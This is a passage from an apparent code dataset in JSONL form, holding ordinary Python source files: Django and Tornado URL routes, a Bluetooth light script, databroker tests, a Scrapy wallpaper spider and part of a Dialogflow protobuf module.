"usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 593, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 593, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 604, "usage_type": "argument"}, {"api_name": "slc.Forwardmask", "line_number": 608, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 609, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 609, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 613, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 614, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 614, "usage_type": "name"}, {"api_name": "telnetlib.BRK", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.IP", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.AO", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.AYT", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.EC", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.EL", "line_number": 627, "usage_type": "name"}, {"api_name": "telnetlib.NOP", "line_number": 628, "usage_type": "name"}, {"api_name": "telnetlib.DM", "line_number": 628, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 628, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 768, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 811, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 812, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 872, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 875, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 877, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 880, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 880, "usage_type": "argument"}, {"api_name": "telnetlib.WONT", "line_number": 881, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 902, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 904, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 906, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 908, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 909, "usage_type": "argument"}, {"api_name": "telnetlib.TM", "line_number": 909, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 910, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 911, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 911, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.BINARY", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.EXOPL", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 912, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 914, "usage_type": "argument"}, {"api_name": "telnetlib.STATUS", "line_number": 916, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 918, "usage_type": "argument"}, {"api_name": "telnetlib.STATUS", "line_number": 918, "usage_type": "argument"}, {"api_name": "telnetlib.WONT", "line_number": 923, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 935, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 937, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 937, "usage_type": "name"}, {"api_name": "telnetlib.BINARY", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.EOR", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 965, "usage_type": "name"}, {"api_name": "telnetlib.ECHO", "line_number": 966, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 968, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 973, "usage_type": "argument"}, {"api_name": "telnetlib.NAWS", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 974, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 975, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 976, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 979, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 980, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 980, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 983, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 983, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 984, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 985, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 987, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 987, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 988, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 991, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 992, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 996, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 999, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1002, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1003, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1007, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1008, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1012, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1017, "usage_type": "argument"}, {"api_name": "telnetlib.TM", "line_number": 1031, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1031, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 1033, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1035, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 1035, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1036, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1039, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1039, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1041, "usage_type": "argument"}, {"api_name": "telnetlib.LOGOUT", "line_number": 1041, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1061, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1065, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1066, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1067, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1068, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1071, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1072, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1074, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1076, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1078, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1080, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1082, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1084, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1086, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1112, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 1126, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1129, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 1133, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1136, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 1140, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 1147, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1154, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1156, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1157, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1164, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 1182, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1185, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 1189, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1194, "usage_type": "name"}, {"api_name": "telnetlib.LFLOW", "line_number": 1195, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1201, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1207, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1207, "usage_type": "name"}, {"api_name": "slc.SLC_definition", "line_number": 1232, "usage_type": "call"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1239, "usage_type": "argument"}, {"api_name": "telnetlib.DO", "line_number": 1242, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1242, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1246, "usage_type": "argument"}, {"api_name": "telnetlib.WILL", "line_number": 1249, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1249, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1252, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1255, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1257, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1257, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1258, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1259, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1259, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1260, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1261, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1271, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1271, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1272, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 1274, "usage_type": "call"}, {"api_name": "telnetlib.IAC", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1275, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1279, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 1279, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1285, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 1286, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1287, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 1288, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1289, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 1289, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1293, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1293, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 1294, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 1294, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 1309, "usage_type": "name"}, {"api_name": "slc.SLC_definition", "line_number": 1311, "usage_type": "call"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1311, "usage_type": "argument"}, {"api_name": "slc._POSIX_VDISABLE", "line_number": 1311, "usage_type": "argument"}, {"api_name": "telnetlib.theNULL", "line_number": 1321, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1334, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 1334, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 1339, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 1339, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 1339, "usage_type": "name"}, {"api_name": "slc.NSLC", "line_number": 1345, "usage_type": "name"}, {"api_name": "slc.name_slc_command", "line_number": 1366, "usage_type": "call"}, {"api_name": "slc.name_slc_command", "line_number": 1380, "usage_type": "call"}, {"api_name": "slc.NSLC", "line_number": 1383, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1385, "usage_type": "call"}, {"api_name": "telnetlib.theNULL", "line_number": 1389, "usage_type": "name"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1390, "usage_type": "name"}, {"api_name": "slc.SLC_VARIABLE", "line_number": 1395, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1426, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1429, "usage_type": "call"}, {"api_name": "slc.SLC_ACK", "line_number": 1430, "usage_type": "argument"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1434, "usage_type": "name"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1436, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1440, "usage_type": "argument"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1443, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1443, "usage_type": "name"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1445, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1445, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1446, "usage_type": "call"}, {"api_name": "telnetlib.theNULL", "line_number": 1452, "usage_type": "name"}, {"api_name": "slc.SLC_ACK", "line_number": 1455, "usage_type": "argument"}, {"api_name": "slc.SLC_DEFAULT", "line_number": 1462, "usage_type": "name"}, {"api_name": "slc.SLC_ACK", "line_number": 1466, "usage_type": "argument"}, {"api_name": "slc.SLC_CANTCHANGE", "line_number": 1468, "usage_type": "name"}, {"api_name": "slc.SLC_NOSUPPORT", "line_number": 1470, "usage_type": "argument"}, {"api_name": "slc.SLC_CANTCHANGE", "line_number": 1475, "usage_type": "name"}, {"api_name": "slc.DEFAULT_SLC_TAB.get", "line_number": 1476, "usage_type": "call"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 1476, "usage_type": "name"}, {"api_name": "slc.SLC_nosupport", "line_number": 1477, "usage_type": "call"}, {"api_name": "telnetlib.BINARY", "line_number": 1498, "usage_type": "argument"}, {"api_name": "telnetlib.theNULL", "line_number": 1502, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 1506, "usage_type": "name"}, {"api_name": "slc.Forwardmask", "line_number": 1517, "usage_type": "call"}]} diff --git a/1002.jsonl b/1002.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b94b9d8d4f040b9f4843301d68e94cb8c929c60 --- /dev/null +++ b/1002.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:018ccf94dd59a5333209817b02250a2c736f53eec1950a61e960e2e01c0deac6 +size 42225610 diff --git a/1015.jsonl b/1015.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ea129986d71bda2a9d63d9a6550041a01d9d601 --- /dev/null +++ b/1015.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9482f42a5123c647adfeaacef62d54b1cad548d32de5405ca32ccc348f68910 +size 56526860 diff --git a/1019.jsonl b/1019.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69d00ce4a999f0e4adbd867ca8fb8082c5883b46 --- /dev/null +++ b/1019.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b91212dece5ad796ce1058fccafa63653da5cf78e651efc289c44381c635a3ba +size 65397505 diff --git a/102.jsonl b/102.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcf2f5ff46f8b134339f8bf1b8b391a8d812cb4d --- /dev/null +++ b/102.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd512ea776938c20266c1e21475672acc35ea17066321c074efa263967d022b1 +size 58368120 diff --git a/1020.jsonl b/1020.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6a3fe186578ebcaf71e68c0b389c7096d6763d --- /dev/null +++ b/1020.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83ac41d1f132cd5652b10ff9d0031c8b4152ea062f9ec51aebc87edab62342cb +size 12182997 diff --git a/1037.jsonl b/1037.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75fc2c970d2b5ec19d506fecf2d6533c6b3054f7 --- /dev/null +++ b/1037.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0681a98d7b8d7ae78eebe9349018de9696aefd905cc667a34f127dfc4cf1ab71 +size 58461757 diff --git a/1039.jsonl b/1039.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..101a5c289be2e3a3eaaffa005eb23605d61f4c46 --- /dev/null +++ b/1039.jsonl @@ -0,0 +1,426 @@ +{"seq_id": "42213343", "text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexView, name='index'),\n url(r'^resources/$', views.ResourceView, name='resources'),\n url(r'^(?P[0-9]+)/rtn/$', views.RoutineView, name='RoutineView'),\n url(r'^result/(?P[0-9]+)/(?P[0-9]+)/$', views.ResultView, name='results'),\n # url(r'^feedback/$',views.FeedbackView,name='feedback'),\n\n]\n", "sub_path": "myKcmit/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "503034547", "text": "#!/usr/bin/python\n# coding=utf-8\n# author:ldx\n\nfrom tornado.web import url\nfrom api import *\n\nurls=[\n #云主机相关url\n url(r'/vms$', InstancesHandler),\n url(r'/single-instance/(?P.*)$', SingleInstanceHandler),\n url(r'/single-instance-action/(?P.*)$', SingleInstanceActionHandler),\n url(r'/nova-services$', NovaServicesHandler),\n\n #云主机可用域\n url(r'/nova-az$', InstancesHandler),\n\n #云主机模板相关url\n url(r'/flavors$', FlavorsHandler),\n url(r'/single-flavor/(?P.*)$', SingleFlavorHandler),\n\n #云主机监控数据\n url(r'/instance_monitor_data$', InstanceMonitorHandler),\n ]\n", "sub_path": "cloud_api/compute_api/handlers/compute/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tornado.web.url", "line_number": 10, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 11, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 12, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 13, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 16, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 19, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 20, "usage_type": "call"}, {"api_name": "tornado.web.url", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "175273750", "text": "from modules.BluetoothLightController import BluetoothLightController\r\nimport time\r\n\r\nif __name__ == '__main__':\r\n\r\n # Bluetooth Light MAC Addresses\r\n ctrl = BluetoothLightController(\r\n [\r\n 'C4:BE:84:51:A6:BC', # Behind TV\r\n 'C4:BE:84:51:CE:6F', # Desk-Left\r\n 'C4:BE:84:51:DA:D7' # Behind-Bed\r\n ]\r\n )\r\n\r\n while True:\r\n # Uncomment a mode to enable it.\r\n #ctrl.orb()\r\n #ctrl.turn_on()\r\n #ctrl.turn_off()\r\n ctrl.orb_night()\r\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "modules.BluetoothLightController.BluetoothLightController", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "590158601", "text": "import time as ttime\nimport uuid\n\nimport numpy as np\nimport pytest\nfrom filestore.test.utils import fs_setup, fs_teardown\nfrom metadatastore.commands import insert_run_start\nfrom metadatastore.test.utils import mds_setup, mds_teardown\nfrom numpy.testing.utils import assert_array_equal\n\nfrom databroker import DataBroker as db\nfrom databroker.pims_readers import Images, get_images\nfrom ..examples.sample_data import image_and_scalar\nfrom ..utils.diagnostics import watermark\n\n\n@pytest.fixture(scope='module')\ndef image_uid():\n rs = insert_run_start(time=ttime.time(), scan_id=105,\n owner='stepper', beamline_id='example',\n uid=str(uuid.uuid4()), cat='meow')\n image_and_scalar.run(run_start_uid=rs)\n return rs\n\n\ndef setup_module(module):\n mds_setup()\n fs_setup()\n\n\ndef teardown_module(module):\n mds_teardown()\n fs_teardown()\n\n\ndef test_watermark():\n result = watermark()\n assert result\n\n\ndef test_pims_images_old_api(image_uid):\n header = db[image_uid]\n images = Images(header, 'img')\n images[:5] # smoke test\n assert images.pixel_type == np.float64\n assert_array_equal(images.frame_shape, images[0].shape)\n assert len(images) == image_and_scalar.num1\n\n\ndef test_pims_images(image_uid):\n header = db[image_uid]\n images = get_images(header, 'img')\n images[:5] # smoke test\n assert images.pixel_type == np.float64\n assert_array_equal(images.frame_shape, images[0].shape)\n assert len(images) == image_and_scalar.num1\n\n", "sub_path": "databroker/tests/test_misc.py", "file_name": "test_misc.py", "file_ext": "py", "file_size_in_byte": 1530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "metadatastore.commands.insert_run_start", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 19, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 21, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.run", "line_number": 22, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 22, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "metadatastore.test.utils.mds_setup", "line_number": 27, "usage_type": "call"}, {"api_name": "filestore.test.utils.fs_setup", "line_number": 28, "usage_type": "call"}, {"api_name": "metadatastore.test.utils.mds_teardown", "line_number": 32, "usage_type": "call"}, {"api_name": "filestore.test.utils.fs_teardown", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.diagnostics.watermark", "line_number": 37, "usage_type": "call"}, {"api_name": "databroker.DataBroker", "line_number": 42, "usage_type": "name"}, {"api_name": "databroker.pims_readers.Images", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.testing.utils.assert_array_equal", "line_number": 46, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.num1", "line_number": 47, "usage_type": "attribute"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 47, "usage_type": "name"}, {"api_name": "databroker.DataBroker", "line_number": 51, "usage_type": "name"}, {"api_name": "databroker.pims_readers.get_images", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.testing.utils.assert_array_equal", "line_number": 55, "usage_type": "call"}, {"api_name": "examples.sample_data.image_and_scalar.num1", "line_number": 56, "usage_type": "attribute"}, {"api_name": "examples.sample_data.image_and_scalar", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "344219439", "text": "import scrapy\nfrom meinvPro.items import MeinvproItem\n\n\nclass MeinvSpider(scrapy.Spider):\n name = 'meinv'\n # allowed_domains = ['www.xxx.com']\n start_urls = ['http://pic.netbian.com/4kdongwu/']\n\n url = 'http://pic.netbian.com/4kdongwu/index_%d.html'\n page_num = 2\n\n # 解析详情页数据\n def parse_detail(self, response):\n item = response.meta['item']\n img_name = response.xpath('//*[@id=\"main\"]/div[2]/div[1]/div[1]/h1/text()').extract_first()\n img_size = response.xpath('//*[@id=\"main\"]/div[2]/div[2]/div[2]/p[3]/span/text() | //*[@id=\"main\"]/div[2]/div[2]/div[3]/p[3]/span/text()').extract_first()\n item['img_name'] = img_name\n item['img_size'] = img_size\n yield item\n\n # 解析首页\n def parse(self, response):\n li_list = response.xpath('//*[@id=\"main\"]/div[3]/ul/li')\n\n for li in li_list:\n img_href = 'http://pic.netbian.com' + li.xpath('./a/@href').extract_first()\n img_src = 'http://pic.netbian.com' + li.xpath('./a/img/@src').extract_first()\n\n item = MeinvproItem() # 一条数据对应一个对象\n item['img_src'] = img_src\n yield scrapy.Request(url=img_href, callback=self.parse_detail, meta={'item':item}) # 请求传参\n\n # 分页爬取\n if self.page_num <= 20:\n new_url = format(self.url%self.page_num)\n self.page_num += 1\n yield scrapy.Request(url=new_url, callback=self.parse)", "sub_path": "meinvPro/meinvPro/spiders/meinv.py", "file_name": "meinv.py", "file_ext": "py", "file_size_in_byte": 1483, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "meinvPro.items.MeinvproItem", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 32, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "395911847", "text": "# -*- coding: utf-8 -*-\n# Copyright 2022 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nfrom google.protobuf import field_mask_pb2 # type: ignore\nimport proto # type: ignore\n\n__protobuf__ = proto.module(\n package=\"google.cloud.dialogflow.v2beta1\",\n manifest={\n \"KnowledgeBase\",\n \"ListKnowledgeBasesRequest\",\n \"ListKnowledgeBasesResponse\",\n \"GetKnowledgeBaseRequest\",\n \"CreateKnowledgeBaseRequest\",\n \"DeleteKnowledgeBaseRequest\",\n \"UpdateKnowledgeBaseRequest\",\n },\n)\n\n\nclass KnowledgeBase(proto.Message):\n r\"\"\"A knowledge base represents a collection of knowledge documents that\n you provide to Dialogflow. Your knowledge documents contain\n information that may be useful during conversations with end-users.\n Some Dialogflow features use knowledge bases when looking for a\n response to an end-user input.\n\n For more information, see the `knowledge base\n guide `__.\n\n Note: The ``projects.agent.knowledgeBases`` resource is deprecated;\n only use ``projects.knowledgeBases``.\n\n Attributes:\n name (str):\n The knowledge base resource name. The name must be empty\n when creating a knowledge base. Format:\n ``projects//locations//knowledgeBases/``.\n display_name (str):\n Required. The display name of the knowledge\n base. The name must be 1024 bytes or less;\n otherwise, the creation request fails.\n language_code (str):\n Language which represents the 